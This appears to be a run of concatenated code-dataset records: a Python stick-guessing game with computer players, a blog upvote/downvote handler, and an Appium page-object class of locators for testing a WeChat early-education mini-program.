win_count))\n", "step-4": "from random import randint\n\n\nclass Game(object):\n\n def __init__(self, players):\n if len(players) < 2:\n raise ValueError('Number of player must be at least 2')\n self.play_order = players\n self.player_data = {}\n for player in self.play_order:\n self.player_data[player] = [3, None, None, False]\n self.player_data['IA 1'][3] = True\n self.player_data['IA 2'][3] = True\n\n def game_loop(self):\n while not self.won():\n hunches = []\n for player, data in self.player_data.items():\n print('Jogador: {}'.format(player))\n if data[3]:\n data[1] = randint(0, data[0])\n else:\n data[1] = randint(0, data[0])\n print('Palitos na mão: {}\\n'.format(data[1]))\n for player in self.play_order:\n print('Jogador: {}'.format(player))\n if self.player_data[player][3]:\n hunch = self.hunch(player, hunches)\n self.player_data[player][2] = hunch\n else:\n hunch = randint(0, self.max())\n while hunch in hunches:\n hunch = randint(0, self.max())\n self.player_data[player][2] = hunch\n print('Palpite: {}\\n'.format(hunch))\n hunches.append(hunch)\n winner = self.round_won()\n print('Soma dos palitos: {}'.format(self.sum()))\n if winner:\n print('{} ganhou a rodada\\n'.format(winner))\n self.player_data[winner][0] -= 1\n self.play_order.remove(winner)\n self.play_order.insert(0, winner)\n else:\n print('Ninguém ganhou :(\\n')\n print('-' * 10 + ' nova rodada ' + '-' * 10)\n self.reset()\n for player, data in self.player_data.items():\n if data[0] == 0:\n print('{} ganhou o jogo'.format(player))\n return player\n\n def hunch(self, player, hunches):\n hunch = self.player_data[player][1]\n rand = 0\n sticks = []\n stik = 0\n for other_player in self.play_order[0:self.play_order.index(player)]:\n average = self.average(self.play_order[self.play_order.index(\n other_player):len(self.play_order) - 1])\n stik = self.player_data[other_player][2] - average[0]\n for stick in sticks:\n stik -= stick\n sticks.append(stik)\n rand += average[1]\n hunch += stik\n average = self.average(self.play_order[self.play_order.index(player\n ):len(self.play_order) - 1])\n rand += average[1]\n hunch += average[0] + rand // 2\n if self.average(self.play_order)[0] > hunch:\n i = 0\n while hunch in hunches or hunch > self.max() or hunch < 0:\n i += 1\n if i % 2 == 0:\n hunch -= i\n else:\n hunch += i\n else:\n i = 0\n while hunch in hunches or hunch > self.max() or hunch < 0:\n i += 1\n if i % 2 == 0:\n hunch += i\n else:\n hunch -= i\n return hunch\n\n def average(self, remaining_players):\n result = 0\n for player in remaining_players:\n result += self.player_data[player][0]\n return [result // 2, result % 2]\n\n def max(self):\n total = 0\n for player in self.play_order:\n total += self.player_data[player][0]\n return total\n\n def reset(self):\n for player, data in self.player_data.items():\n data[1] = None\n data[2] = None\n\n def round_won(self):\n sum = self.sum()\n for player, data in self.player_data.items():\n if data[2] == sum:\n return player\n return None\n\n def won(self):\n for player, data in self.player_data.items():\n if data[0] == 0:\n return True\n return False\n\n def sum(self):\n sum = 0\n for player, data in self.player_data.items():\n sum += data[1]\n return sum\n\n\nif __name__ == '__main__':\n players = ['Rand A', 'Rand B', 'Rand C', 'IA 1', 'IA 2']\n wins = {}\n n = 1\n for player in players:\n wins[player] = 0\n for i in range(0, n):\n game = Game(players)\n winner = game.game_loop()\n if winner:\n wins[winner] += 1\n print('\\nRelatório:')\n for player, win_count in wins.items():\n print('{} ganhou {} vezes'.format(player, win_count))\n", "step-5": "from random import randint\n\n\nclass Game(object):\n def __init__(self, players):\n if len(players) < 2:\n raise ValueError('Number of player must be at least 2')\n\n self.play_order = players\n\n self.player_data = {}\n for player in self.play_order:\n # [total, on_hand, hunch]\n self.player_data[player] = [3, None, None, False]\n self.player_data['IA 1'][3] = True\n self.player_data['IA 2'][3] = True\n\n def game_loop(self):\n while not self.won():\n hunches = []\n\n for player, data in self.player_data.items():\n print(\"Jogador: {}\".format(player))\n if (data[3]):\n data[1] = randint(0, data[0])\n\n else:\n data[1] = randint(0, data[0])\n\n print(\"Palitos na mão: {}\\n\".format(data[1]))\n\n for player in self.play_order:\n print(\"Jogador: {}\".format(player))\n if (self.player_data[player][3]):\n hunch = self.hunch(player, hunches)\n self.player_data[player][2] = hunch\n\n else:\n # random hunch\n hunch = randint(0, self.max())\n while hunch in hunches:\n hunch = randint(0, self.max())\n self.player_data[player][2] = hunch\n\n # human hunch\n # hunch = int(input(\"Qual seu palpite?\\n\"))\n # while (hunch in hunches):\n # hunch = int(input(\"Palpite invalido. \\nQual seu palpite?\\n\"))\n # self.player_data[player][2] = hunch\n\n print(\"Palpite: {}\\n\".format(hunch))\n\n hunches.append(hunch)\n\n winner = self.round_won()\n\n print(\"Soma dos palitos: {}\".format(self.sum()))\n\n if winner:\n print(\"{} ganhou a rodada\\n\".format(winner))\n self.player_data[winner][0] -= 1\n self.play_order.remove(winner)\n self.play_order.insert(0, winner)\n else:\n print(\"Ninguém ganhou :(\\n\")\n\n print((\"-\" * 10) + \" nova rodada \" + (\"-\" * 10))\n\n self.reset()\n\n for player, data in self.player_data.items():\n if data[0] == 0:\n print(\"{} ganhou o jogo\".format(player))\n return player\n\n def hunch(self, player, hunches):\n # seu palpite inicial eh pelo menos a sua quantidade de palitos\n hunch = self.player_data[player][1]\n rand = 0\n sticks = []\n stik = 0\n # calcula os palitos dos jogadores anteriores atraves dos palpites destes\n for other_player in self.play_order[0:self.play_order.index(player)]:\n # media dos proximos jogadores\n average = self.average(self.play_order[self.play_order.index(other_player):len(self.play_order) - 1])\n\n # calcula os palitos estimados do jogador\n stik = self.player_data[other_player][2] - average[0]\n\n # remove os palitos anteriores que ja estao considerados\n for stick in sticks:\n stik -= stick\n sticks.append(stik)\n\n # erros de arredondamento, adiciona a randomicidade esperada\n rand += average[1]\n hunch += stik\n\n # chama average com os jogadores remanescente\n average = self.average(self.play_order[self.play_order.index(player):len(self.play_order) - 1])\n\n # caso o numero seja quebrado (0.5) adiciona-se 1 a randomicidade\n rand += average[1]\n\n # valor estimado, com metade da randomicidade\n hunch += average[0] + rand // 2\n\n # caso o chute ja tenha sido usado, chutar o mais proximo possivel\n # começando pelo lado mais proximo da media\n if (self.average(self.play_order)[0] > hunch):\n i = 0\n while (hunch in hunches) or (hunch > self.max()) or (hunch < 0):\n i += 1\n if i % 2 == 0:\n hunch -= i\n else:\n hunch += i\n\n else:\n i = 0\n while (hunch in hunches) or (hunch > self.max()) or (hunch < 0):\n i += 1\n if i % 2 == 0:\n hunch += i\n else:\n hunch -= i\n # retorna seu chute\n return hunch\n\n def average(self, remaining_players):\n result = 0\n for player in remaining_players:\n result += self.player_data[player][0]\n\n # entrega a media do resultado, e se houve sobra entrega 1 no segundo argumento\n return [result // 2, result % 2]\n\n def max(self):\n total = 0\n for player in self.play_order:\n total += self.player_data[player][0]\n return total\n\n def reset(self):\n for player, data in self.player_data.items():\n data[1] = None\n data[2] = None\n\n def round_won(self):\n sum = self.sum()\n\n for player, data in self.player_data.items():\n if data[2] == sum:\n return player\n return None\n\n def won(self):\n for player, data in self.player_data.items():\n if data[0] == 0:\n return True\n return False\n\n def sum(self):\n sum = 0\n\n for player, data in self.player_data.items():\n sum += data[1]\n\n return sum\n\n\nif __name__ == '__main__':\n players = ['Rand A', 'Rand B', 'Rand C', 'IA 1', 'IA 2']\n wins = {}\n\n n = 1\n\n for player in players:\n wins[player] = 0\n\n for i in range(0, n):\n game = Game(players)\n winner = game.game_loop()\n if winner:\n wins[winner] += 1\n\n print(\"\\nRelatório:\")\n for player, win_count in wins.items():\n print(\"{} ganhou {} vezes\".format(player, win_count))\n", "step-ids": [ 7, 10, 11, 12, 13 ] }
[ 7, 10, 11, 12, 13 ]
# [BEGIN IMPORTS] from mainhandler import MainHandler from sec.data import * # [END IMPORTS] class UpVoteHandler (MainHandler): def get(self): user = self.get_user() if user: post_id = self.request.get('post_id') post = PostData.get_by_id(int(post_id)) voter_list = post.voter_list if post.author == user: error = "cant vote for self" self.render('mainpage.html', error=error) elif user in voter_list: error = "cant vote twice" self.render('mainpage.html', error=error) else: post.upscore += 1 voter_list.append(user) post.put() self.redirect('/blog/' + post_id) else: self.redirect('/') class DownVoteHandler (MainHandler): def get(self): user = self.get_user() if user: post_id = self.request.get('post_id') post = PostData.get_by_id(int(post_id)) voter_list = post.voter_list if post.author == user: error = "cant vote for self" self.render('mainpage.html', error=error) elif user in voter_list: error = "cant vote twice" self.render('mainpage.html', error=error) else: post.downscore += 1 voter_list.append(user) post.put() self.redirect('/blog/' + post_id) else: self.redirect('/')
normal
{ "blob_id": "5711613df0bda10512466f147febcffacfe1607b", "index": 7794, "step-1": "<mask token>\n\n\nclass DownVoteHandler(MainHandler):\n\n def get(self):\n user = self.get_user()\n if user:\n post_id = self.request.get('post_id')\n post = PostData.get_by_id(int(post_id))\n voter_list = post.voter_list\n if post.author == user:\n error = 'cant vote for self'\n self.render('mainpage.html', error=error)\n elif user in voter_list:\n error = 'cant vote twice'\n self.render('mainpage.html', error=error)\n else:\n post.downscore += 1\n voter_list.append(user)\n post.put()\n self.redirect('/blog/' + post_id)\n else:\n self.redirect('/')\n", "step-2": "<mask token>\n\n\nclass UpVoteHandler(MainHandler):\n <mask token>\n\n\nclass DownVoteHandler(MainHandler):\n\n def get(self):\n user = self.get_user()\n if user:\n post_id = self.request.get('post_id')\n post = PostData.get_by_id(int(post_id))\n voter_list = post.voter_list\n if post.author == user:\n error = 'cant vote for self'\n self.render('mainpage.html', error=error)\n elif user in voter_list:\n error = 'cant vote twice'\n self.render('mainpage.html', error=error)\n else:\n post.downscore += 1\n voter_list.append(user)\n post.put()\n self.redirect('/blog/' + post_id)\n else:\n self.redirect('/')\n", "step-3": "<mask token>\n\n\nclass UpVoteHandler(MainHandler):\n\n def get(self):\n user = self.get_user()\n if user:\n post_id = self.request.get('post_id')\n post = PostData.get_by_id(int(post_id))\n voter_list = post.voter_list\n if post.author == user:\n error = 'cant vote for self'\n self.render('mainpage.html', error=error)\n elif user in voter_list:\n error = 'cant vote twice'\n self.render('mainpage.html', error=error)\n else:\n post.upscore += 1\n voter_list.append(user)\n post.put()\n self.redirect('/blog/' + post_id)\n else:\n self.redirect('/')\n\n\nclass DownVoteHandler(MainHandler):\n\n def get(self):\n user = self.get_user()\n if user:\n post_id = self.request.get('post_id')\n post = PostData.get_by_id(int(post_id))\n voter_list = post.voter_list\n if post.author == user:\n error = 'cant vote for self'\n self.render('mainpage.html', error=error)\n elif user in voter_list:\n error = 'cant vote twice'\n self.render('mainpage.html', error=error)\n else:\n post.downscore += 1\n voter_list.append(user)\n post.put()\n self.redirect('/blog/' + post_id)\n else:\n self.redirect('/')\n", "step-4": "from mainhandler import MainHandler\nfrom sec.data import *\n\n\nclass UpVoteHandler(MainHandler):\n\n def get(self):\n user = self.get_user()\n if user:\n post_id = self.request.get('post_id')\n post = PostData.get_by_id(int(post_id))\n voter_list = post.voter_list\n if post.author == user:\n error = 'cant vote for self'\n self.render('mainpage.html', error=error)\n elif user in voter_list:\n error = 'cant vote twice'\n self.render('mainpage.html', error=error)\n else:\n post.upscore += 1\n voter_list.append(user)\n post.put()\n self.redirect('/blog/' + post_id)\n else:\n self.redirect('/')\n\n\nclass DownVoteHandler(MainHandler):\n\n def get(self):\n user = self.get_user()\n if user:\n post_id = self.request.get('post_id')\n post = PostData.get_by_id(int(post_id))\n voter_list = post.voter_list\n if post.author == user:\n error = 'cant vote for self'\n self.render('mainpage.html', error=error)\n elif user in voter_list:\n error = 'cant vote twice'\n self.render('mainpage.html', error=error)\n else:\n post.downscore += 1\n voter_list.append(user)\n post.put()\n self.redirect('/blog/' + post_id)\n else:\n self.redirect('/')\n", "step-5": "# [BEGIN IMPORTS]\nfrom mainhandler import MainHandler\nfrom sec.data import *\n# [END IMPORTS]\n\n\nclass UpVoteHandler (MainHandler):\n\n def get(self):\n user = self.get_user()\n if user:\n post_id = self.request.get('post_id')\n post = PostData.get_by_id(int(post_id))\n\n voter_list = post.voter_list\n\n if post.author == user:\n error = \"cant vote for self\"\n self.render('mainpage.html', error=error)\n elif user in voter_list:\n error = \"cant vote twice\"\n self.render('mainpage.html', error=error)\n else:\n post.upscore += 1\n voter_list.append(user)\n post.put()\n self.redirect('/blog/' + post_id)\n else:\n self.redirect('/')\n\n\nclass DownVoteHandler (MainHandler):\n\n def get(self):\n user = self.get_user()\n if user:\n post_id = self.request.get('post_id')\n post = PostData.get_by_id(int(post_id))\n\n voter_list = post.voter_list\n\n if post.author == user:\n error = \"cant vote for self\"\n self.render('mainpage.html', error=error)\n elif user in voter_list:\n error = \"cant vote twice\"\n self.render('mainpage.html', error=error)\n else:\n post.downscore += 1\n voter_list.append(user)\n post.put()\n self.redirect('/blog/' + post_id)\n else:\n self.redirect('/')\n", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
#!/usr/bin/env python # -*- coding: utf-8 -*- # @Time : 2019/4/14 14:31 # @Author : lixiaofeng # @File : page_zaojiao.py # @Software: PyCharm # @desc : from common.basics import Crazy class Zaojiaopage(Crazy): """早教小程序""" zao_btn_loc = ('xpath', '//*[@resource-id="com.tencent.mm:id/cx" and @text="包妈优选"]') # zao_btn_loc = ('xpath', '//*[@resource-id="com.tencent.mm:id/cx" and @text="小小包早教"]') def click_zao(self): self.click(self.zao_btn_loc) def element_zao(self): return self.find_element(self.zao_btn_loc) find_loc = ('xpath', '//*[@resource-id="com.tencent.mm:id/d7b" and @text="发现"]') # 发现按钮 def click_find(self): self.click(self.find_loc) title_btn_loc = ('xpath', '//*[@resource-id="android:id/title" and @text="小程序"]') # 发现页小程序按钮 def click_title_btn(self): self.click(self.title_btn_loc) helper_loc = ('xpath', '//*[@resource-id="com.tencent.mm:id/c5" and @text="小程序助手"]') # 小程序助手 def element_helper(self): return self.find_element(self.helper_loc) def click_helper(self): self.click(self.helper_loc) small_help_btn_loc = ('xpath', '//*[@resource-id="com.tencent.mm:id/cx" and @text="小程序助手"]') # 小程序助手 def click_small_help_btn(self): self.click(self.small_help_btn_loc) small_name_loc = ('xpath', '//*[contains(@text, "包妈优选")]') # 包妈优选 def element_small_name(self): return self.find_element(self.small_name_loc) def click_small_name(self): self.click(self.small_name_loc) switching_applet_btn_loc = ('xpath', '//*[contains(@text, "切换小程序")]') # 切换小程序 def click_switching_applet_btn(self): self.click(self.switching_applet_btn_loc) delete_small_btn_loc = ('xpath', '//*[contains(@text, "删除")]') # 删除小程序按钮 def click_delete_small_btn(self): self.click(self.delete_small_btn_loc) edition_btn_loc = ('xpath', '//*[contains(@text, "百宝福利Buy")]') def element_edition_btn(self): return self.find_element(self.edition_btn_loc) delete_small1_btn_loc = ('xpath', '//*[contains(@text, "拖动到此处删除")]') def element_delete_small1_btn(self): return self.find_element(self.delete_small1_btn_loc) version_btn_loc = ('xpath', '//*[contains(@text, "版本查看")]') # 版本查看按钮 def click_version_btn(self): self.click(self.version_btn_loc) experience_version_btn_loc = ('xpath', '//*[contains(@text, "6.0.09")]') # 体验版 def clicks_experience_version_btn(self): self.clicks(self.experience_version_btn_loc, -1) audition_class_btn_loc = ('xpath', '//*[contains(@text, "0元领取10节试听课")]') # 领取试听课 def element_audition_class_btn(self): return self.find_element(self.audition_class_btn_loc) def click_audition_class_btn(self): self.click(self.audition_class_btn_loc) wechat_grant_btn_loc = (('xpath', '//*[contains(@text, "微信授权") and @class="android.widget.Button" ]')) # 微信授权 def click_wechat_grant_btn(self): self.click(self.wechat_grant_btn_loc) def double_click_wechat_grant(self): self.double_click(self.wechat_grant_btn_loc) def element_wechat_grant_btn(self): return self.find_element(self.wechat_grant_btn_loc) allow_btn_loc = ('xpath', '//*[@resource-id="com.tencent.mm:id/st" and @text="允许"]') # 完成按钮 def click_allow_btn(self): self.click(self.allow_btn_loc) month_btn_loc = ('xpath', '//*[contains(@text, "2018")]') # 选择月份 def click_mouth_btn(self): self.click(self.month_btn_loc) sure_btn_loc = ('xpath', '//*[contains(@text, "确定")]') # 确定按钮 def click_sure_btn(self): self.click(self.sure_btn_loc) class_info_loc = ('xpath', '//*[contains(@text, "课程介绍")]') # 课程介绍 # class_info_loc = ('xpath', '//android.widget.FrameLayout/android.view.ViewGroup[0]') # 课程介绍 def class_info_btn(self): self.click(self.class_info_loc) attend_lectures_btn_loc = ('xpath', '//*[contains(@text, "立即听课")]') # 立即听课 def element_attend_lectures_btn(self): return self.find_element(self.attend_lectures_btn_loc) def click_attend_lectures_btn(self): self.click(self.attend_lectures_btn_loc) class_btn_loc = ('xpath', '//*[contains(@text, "预备课 预备课")]') # 预备课 预备课 def element_class_btn(self): return self.find_element(self.class_btn_loc) get_to_know_btn_loc = ('xpath', '//*[contains(@text, "立即了解正式课 ")]') # 立即了解正式课 def click_get_to_know_btn(self): self.click(self.get_to_know_btn_loc) def element_get_to_know_btn(self): return self.find_element(self.get_to_know_btn_loc) sure_buy_btn_loc = ('xpath', '//*[contains(@text, "立即购买")]') # 立即购买 def click_sure_buy_btn(self): self.click(self.sure_buy_btn_loc) buy_password_loc = ('id', 'com.tencent.mm:id/cfs') # 输入支付密码 def input_buy_password(self, paw): self.send_keys(self.buy_password_loc, paw) check_buy_money_loc = ('id', 'com.tencent.mm:id/dlh') # 获取支付金额 def text_buy_money(self): return self.get_text(self.check_buy_money_loc) success_btn_loc = ('xpath', '//*[@resource-id="com.tencent.mm:id/f8o" and @text="完成"]') # 完成按钮 def click_success_btn(self): self.click(self.success_btn_loc) check_address_btn_loc = ('xpath', '//*[contains(@text, "收货地址:请选择地址")]') # 选择收货地址 def click_check_address_btn(self): self.click(self.check_address_btn_loc) def element_check_address_btn(self): return self.find_element(self.check_address_btn_loc) add_address_btn_loc = ('xpath', '//*[contains(@text, "添加地址")]') # 添加地址 def click_add_address_btn(self): self.click(self.add_address_btn_loc) name_loc = ('xpath', '//*[contains(@text, "请输入你的姓名")]') # 请输入你的姓名 def input_name_btn(self, name): self.send_keys(self.name_loc, name) phone_btn_loc = ('xpath', '//*[contains(@text, "请填写收件人电话")]') # 请填写收件人电话 def input_phone_btn(self, phone): self.send_keys(self.phone_btn_loc, phone) region_btn_loc = ('xpath', '//*[contains(@text, "请输入你所在地区")]') # 请输入你所在地区 def click_region_btn(self): self.click(self.region_btn_loc) detailed_address_btn_loc = ('xpath', '//*[contains(@text, "请输入你的详细地址")]') # 请输入你的详细地址 def input_detailed_address_btn(self, address): self.send_keys(self.detailed_address_btn_loc, address) save_btn_loc = ('xpath', '//*[contains(@text, "保存")]') # 保存 def click_save_btn(self): self.click(self.save_btn_loc) receive_btn_loc = ('xpath', '//*[contains(@text, "立即领取")]') # 立即领取 def click_receive_btn(self): self.click(self.receive_btn_loc) addressee_loc = ('xpath', '//*[contains(@text, "收件人:")]') # 地址列表是否有地址信息 def elements_addressee(self): return self.find_elements(self.addressee_loc) def clicks_addressee(self): self.clicks(self.addressee_loc, 0) know_btn_loc = ('xpath', '//*[contains(@text, "知道了")]') # 地址列表是否有地址信息 def element_know(self): return self.find_element(self.know_btn_loc) def click_know(self): self.click(self.know_btn_loc) all_curriculum_btn_loc = ('xpath', '//*[contains(@text, "查看全部课程")]') # 查看全部课程 def element_all_curriculum_btn(self): return self.find_element(self.all_curriculum_btn_loc) def click_all_curriculum_btn(self): self.click(self.all_curriculum_btn_loc) curriculum_date_btn_loc = ('xpath', '//*[contains(@text, "2019-0")]') # 历史推送 def element_curriculum_date_btn(self): return self.find_element(self.curriculum_date_btn_loc) my_btn_loc = ('xpath', '//*[@resource-id="com.tencent.mm:id/ct" and @text="我的"]') # 我的 def element_my_btn(self): return self.find_element(self.my_btn_loc) def click_my(self): self.click(self.my_btn_loc) my_baby_btn_loc = ('xpath', '//*[contains(@text, "我的宝宝")]') # 我的宝宝 def click_my_baby(self): self.click(self.my_baby_btn_loc) my_baby_title_loc = ('id', 'com.tencent.mm:id/ox') def text_my_baby_title(self): return self.get_text(self.my_baby_title_loc) def elements_title(self): return self.find_elements(self.my_baby_title_loc) new_baby_btn_loc = ('xpath', '//*[contains(@text, "新建宝宝")]') # 新建宝宝 def element_new_baby_btn(self): return self.find_element(self.new_baby_btn_loc) def click_new_baby_btn(self): self.click(self.new_baby_btn_loc) def clicks_new_baby_btn(self, n): self.clicks(self.new_baby_btn_loc, n) get_set_loc = ('xpath', '//*[contains(@text, "预备课 预备课")]') # 新建宝宝 def element_get_set(self): return self.find_element(self.get_set_loc) next_btn_loc = ('xpath', '//*[contains(@text, "下一步")]') # 我的宝宝 def click_next(self): self.click(self.next_btn_loc) baby_name_loc = ('xpath', '//*[contains(@text, "请输入宝宝姓名")]') # 请输入宝宝姓名 def inputs_baby_name(self, name, n): self.sends_keys(self.baby_name_loc, name, n) baby_bir_btn_loc = ('xpath', '//*[contains(@text, "宝宝的生日:")]') # 宝宝的生日 def click_baby_bir_btn(self): self.click(self.baby_bir_btn_loc) finish_btn_loc = ('xpath', '//*[contains(@text, "完成")]') # 完成按钮 def click_finish_btn(self): self.click(self.finish_btn_loc) def clicks_finish_btn(self, n): self.clicks(self.finish_btn_loc, n) my_home_loc = ('xpath', '//*[@resource-id="com.tencent.mm:id/ct" and @text="首页"]') # 首页 def click_my_home(self): self.click(self.my_home_loc) def element_my_home(self): return self.find_element(self.my_home_loc) switch_btn_loc = ('xpath', '//*[contains(@text, "切换")]') # 切换 def click_switch_btn(self): self.click(self.switch_btn_loc) baby_bri_loc = ('xpath', '//*[contains(@text, "宝宝生日:")]') # 宝宝生日: def click_baby_bri(self): self.click(self.baby_bri_loc) class_img_btn_loc = ('xpath', 'android.widget.Image') def clicks_class_img(self): self.clicks(self.class_img_btn_loc, 0) collection_btn_loc = ('xpath', '//*[contains(@text, "收藏")]') # 收藏 def click_collection_btn(self): self.click(self.collection_btn_loc) def clicks_collection_btn(self, n): self.clicks(self.collection_btn_loc, n) def element_collection_btn(self): return self.find_element(self.collection_btn_loc) write_record_btn_loc = ('xpath', '//*[contains(@text, "写记录") and @class="android.widget.Button" ]') # 写记录按钮 def click_write_record_btn(self): self.click(self.write_record_btn_loc) def clicks_write_record_btn(self, n): self.clicks(self.write_record_btn_loc, n) album_btn_loc = ('xpath', '//*[contains(@text, "相册")]') # 相册 def click_album_btn(self): self.click(self.album_btn_loc) def element_album_btn(self): return self.find_element(self.album_btn_loc) small_video_btn_loc = ('xpath', '//*[contains(@text, "小视频")]') # 小视频 def click_small_video_btn(self): self.click(self.small_video_btn_loc) def element_small_video_btn(self): return self.find_element(self.small_video_btn_loc) release_btn_loc = ('xpath', '//*[contains(@text, "发布")]') # 发布 def click_release_btn(self): self.click(self.release_btn_loc) def clicks_release_btn(self, n): self.clicks(self.release_btn_loc, n) def element_record_info(self, data): # 判断是否定位到包含text的元素 record_info_loc = ('xpath', '//*[contains(@text, "{}")]'.format(data)) record_info = self.find_element(record_info_loc) if record_info: return True else: return False class_name_loc = ('xpath', '//*[contains(@text, "歌曲")]') # 课程名称 # class_name_loc = ('xpath', '//*[contains(@text, "歌曲:Head and shoulders")]') # 课程名称 def click_class_name(self): self.click(self.class_name_loc) def clicks_class_name(self, n): self.clicks(self.class_name_loc, n) def elements_class_name(self): return self.find_elements(self.class_name_loc) class_name2_loc = ('xpath', '//*[contains(@text, "一起走")]') # 课程名称 # class_name2_loc = ('xpath', '//*[contains(@text, "弹出来的画")]') # 课程名称 def click_class2_name(self): self.click(self.class_name2_loc) def clicks_class2_name(self, n): self.clicks(self.class_name2_loc, n) write_text_loc = ('xpath', '//*[contains(@text, "0/1000")]') # 写记录 def input_write_text(self, text): self.send_keys(self.write_text_loc, text) def inputs_write_text(self, text, n): self.sends_keys(self.write_text_loc, text, n) choice_album_loc = ('id', 'com.tencent.mm:id/bpy') def clicks_choice_album(self, n): self.clicks(self.choice_album_loc, n) def elements_choice_album(self): return self.find_elements(self.choice_album_loc) complete_btn_loc = ('id', 'com.tencent.mm:id/ki') # 完成 def click_complete_btn(self): self.click(self.complete_btn_loc) my_collection_btn_loc = ('xpath', '//*[contains(@text, "我的收藏")]') # 我的收藏 def click_my_collection_btn(self): self.click(self.my_collection_btn_loc) my_collection_english_course_btn_loc = ('xpath', '//*[contains(@text, "早教")]') # 早教英语课 def elements_my_collection_english_course_btn(self): return self.find_elements(self.my_collection_english_course_btn_loc) my_collection_game_course_btn_loc = ('xpath', '//*[contains(@text, "宝宝游戏馆")]') # 宝宝游戏馆 def elements_my_collection_game_course_btn(self): return self.find_elements(self.my_collection_game_course_btn_loc) my_course_btn_loc = ('xpath', '//*[contains(@text, "我的课程")]') # 我的课程 def click_my_course_btn(self): self.click(self.my_course_btn_loc) my_course_buy_btn_loc = ('xpath', '//*[contains(@text, "早教核心课年卡")]') # 早教核心课年卡 def elements_my_course_buy_btn(self): return self.find_elements(self.my_course_buy_btn_loc) my_order_btn_loc = ('xpath', '//*[contains(@text, "我的订单")]') # 我的订单 def click_my_order_btn(self): self.click(self.my_order_btn_loc) my_order_card_btn_loc = ('xpath', '//*[contains(@text, "订单编号:")]') # 订单编号: def elements_my_order_card_btn(self): return self.find_elements(self.my_order_card_btn_loc) my_record_btn_loc = ('xpath', '//*[contains(@text, "成长记录")]') # 成长记录 def click_my_record_btn(self): self.click(self.my_record_btn_loc) my_record_class_btn_loc = ('xpath', '//*[contains(@text, "#")]') # # 测试英语课程组 def elements_my_record_class_btn(self): return self.find_elements(self.my_record_class_btn_loc) back_btn_loc = ( 'xpath', '//*[@resource-id="com.tencent.mm:id/on" and @class="android.widget.LinearLayout"]') # 返回按钮 def element_back_btn(self): return self.find_element(self.back_btn_loc) def click_back_btn(self): self.click(self.back_btn_loc) reply_5_loc = ('xpath', '//android.widget.Image') # 回复5 def click_reply_5(self): self.click(self.reply_5_loc) def elements_reply_5(self): return self.find_elements(self.reply_5_loc) add_to_btn_loc = ('xpath', '//*[contains(@text, "立即添加")]') # 立即添加 def click_add_to_btn(self): self.click(self.add_to_btn_loc) reply_input_5_loc = ('id', 'com.tencent.mm:id/ami') def input_reply_5(self, num): self.send_keys(self.reply_input_5_loc, num) send_5_loc = ('xpath', '//*[@resource-id="com.tencent.mm:id/amp" and @text="发送"]') # 发送 def click_send(self): self.click(self.send_5_loc) reply_code_loc = ('id', 'com.tencent.mm:id/ap9') # 获取回复的二维码 def elements_reply_code(self): return self.find_elements(self.reply_code_loc) def clicks_reply_code(self, n): self.clicks(self.reply_code_loc, n) long_code_loc = ('id', 'com.tencent.mm:id/adi') # 长按二维码 def element_long_code(self): return self.find_element(self.long_code_loc) def click_long_code(self): self.click(self.long_code_loc) discern_code_loc = ('xpath', '//*[@resource-id="com.tencent.mm:id/cx" and @text="识别图中二维码"]') # 识别图中二维码 def click_discern_code(self): self.click(self.discern_code_loc) class_group_loc = ('id', 'android:id/text1') # 群名称 def text_class_group(self): return self.get_text(self.class_group_loc) add_group_chat_loc = ('xpath', '//*[contains(@text, "加入该群聊")]') # 加入该群聊 def element_add_group_chat(self): return self.find_element(self.add_group_chat_loc) reply_8_loc = ('xpath', '//android.widget.Image') # 回复8的banner 回复8->进公众号->点击推送 看到的二维码 def elements_reply_8(self): return self.find_elements(self.reply_8_loc) parent_btn_loc = ('xpath', '//*[contains(@text, "亲爱的家长:")]') # 亲爱的家长: def element_parent_btn(self): return self.find_element(self.parent_btn_loc) info_btn_loc = ('id', 'com.tencent.mm:id/a8q') # 详情 def elements_info_btn(self): return self.find_elements(self.info_btn_loc) def clicks_info_btn(self, n): self.clicks(self.info_btn_loc, n) more_games_btn_loc = ('xpath', '//*[contains(@text, "更多亲子游戏")]') # 更多亲子游戏 def click_more_games_btn(self): self.click(self.more_games_btn_loc) look_all_btn_loc = ('xpath', '//*[contains(@text, "查看全部")]') # 查看全部 def click_look_all_btn(self): self.click(self.look_all_btn_loc) def element_look_all_btn(self): return self.find_elements(self.look_all_btn_loc) start_fingerprint_buy_loc = ('id', 'com.tencent.mm:id/btp') # 开启指纹支付弹窗文本 开启指纹支付,支付时可通过验证指纹快速完成付款。 def text_start_fingerprint_buy(self): return self.get_text(self.start_fingerprint_buy_loc) no_more_reminder_btn_loc = ('id', 'com.tencent.mm:id/btq') # 不再提醒 def click_no_more_reminder_btn(self): self.click(self.no_more_reminder_btn_loc) cancel_btn_loc = ('xpath', '//*[@resource-id="com.tencent.mm:id/azz" and @text="取消"]') # 取消 def click_cancel_btn(self): self.click(self.cancel_btn_loc) usd_password_loc = ('xpath', '//*[@resource-id="com.tencent.mm:id/fg4" and @text="使用密码"]') # 使用密码 def element_usd_password(self): return self.find_element(self.usd_password_loc) def click_usd_password(self): self.click(self.usd_password_loc) password_error_loc = ('xpath', '//*[@resource-id="com.tencent.mm:id/d8x" and @text="支付密码错误,请重试"]') # 支付密码错误,请重试 def element_password_error(self): return self.find_element(self.password_error_loc) again_btn_loc = ('xpath', '//*[@resource-id="com.tencent.mm:id/azz" and @text="重试"]') # 重试 def click_again_btn(self): self.click(self.again_btn_loc) payment_loc = ('id', 'com.tencent.mm:id/fg3') # 请输入支付密码 文本 def text_payment(self): return self.get_text(self.payment_loc) typewriting_finish_btn_loc = ('xpath', '//*[@resource-id="com.tencent.mm:id/z2" and @text="完成"]') # 输入法上的完成按钮 def element_typewriting_finish_btn(self): return self.find_element(self.typewriting_finish_btn_loc) def click_typewriting_finish_btn(self): self.click(self.typewriting_finish_btn_loc) # 打卡 clock_btn_loc = ('xpath', '//*[contains(@text, "打卡")]') # 打卡 def click_clock_btn(self): self.click(self.clock_btn_loc) def element_clock_btn(self): return self.find_element(self.clock_btn_loc) # com.tencent.mm:id/ox no_clock_btn_loc = ('xpath', '//*[contains(@text, "你还未开启打卡")]') # 你还未开启打卡 def element_no_clock_btn(self): return self.find_element(self.no_clock_btn_loc) get_card_btn_loc = ('xpath', '//*[@text="获取打卡海报" and @class="android.widget.Button"]') # 获取打卡海报 def click_get_card_btn(self): self.click(self.get_card_btn_loc) upload_card_btn_loc = ('xpath', '//*[@text="上传截图" and @class="android.widget.Button"]') # 上传截图 def click_upload_card_btn(self): self.click(self.upload_card_btn_loc) 